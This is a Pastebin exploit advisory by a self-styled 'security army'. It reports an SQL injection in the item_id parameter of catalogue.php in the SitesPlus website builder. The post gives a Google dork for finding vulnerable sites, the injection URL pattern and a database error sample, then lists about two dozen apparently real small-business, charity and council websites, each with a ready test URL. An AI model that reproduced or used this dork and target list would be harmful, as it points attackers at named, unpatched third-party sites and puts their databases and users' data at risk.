Advertisement
KingSkrupellos

Build your own website with SitesPlus England SQL Injection

Apr 7th, 2020
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.31 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Build your own website with SitesPlus England SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/04/2020
  7. # Vendor Homepage : sitesplus.co.uk
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Build your own website with SitesPlus inurl:/catalogue.php
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Build your own website with SitesPlus England is prone to an SQL-injection vulnerability because
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # SQL Vulnerable File :
  34. **********************
  35. /catalogue.php
  36.  
  37. # SQL Vulnerable Parameter :
  38. ***************************
  39. ?cat=[ID-NUMBER]&subCat=[ID-NUMBER]&item_id=[SQL Injection]
  40.  
  41. # SQL Injection Exploit :
  42. **********************
  43. /catalogue.php?cat=[ID-NUMBER]&subCat=[ID-NUMBER]&item_id=[SQL Injection]
  44.  
  45. ###################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. *************************
  49. [+] makingitlocal.org/catalogue.php?cat=0&subCat=1404&item_id=1%27
  50.  
  51. [+] realdevon.com/catalogue.php?cat=0&subCat=1404&item_id=1%27
  52.  
  53. [+] tastymusic.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  54.  
  55. [+] monktoncourthotel.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  56.  
  57. [+] redlandhouse.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  58.  
  59. [+] devontownsforum.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  60.  
  61. [+] supplements4wellbeing.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  62.  
  63. [+] ellisesfarm.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  64.  
  65. [+] northcliffparktenby.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  66.  
  67. [+] devoncounsellingservices.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  68.  
  69. [+] courthallmonkton.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  70.  
  71. [+] rowerfort.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  72.  
  73. [+] bishopscleevechamber.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  74.  
  75. [+] glfootwear.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  76.  
  77. [+] sherbornevaledtc.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  78.  
  79. [+] homesforholsworthy.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  80.  
  81. [+] digitalmentors.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  82.  
  83. [+] theblackdownhillstrust.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  84.  
  85. [+] ellisesfarm.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  86.  
  87. [+] wellingtonwithoutpc.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  88.  
  89. [+] devontownsforum.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  90.  
  91. [+] basildondas.org.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  92.  
  93. [+] supplements4wellbeing.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  94.  
  95. [+] wiserhealth.co.uk/catalogue.php?cat=0&subCat=1404&item_id=1%27
  96.  
  97. ###################################################################
  98.  
  99. # Example SQL Database Error :
  100. ****************************
  101. MySql error message when opening the query: You have an error in your SQL syntax;
  102. check the manual that corresponds to your MariaDB server version for the right syntax
  103. to use near 'ORDER by sort_order ASC' at line 1
  104.  
  105. ###################################################################
  106.  
  107. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  108.  
  109. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement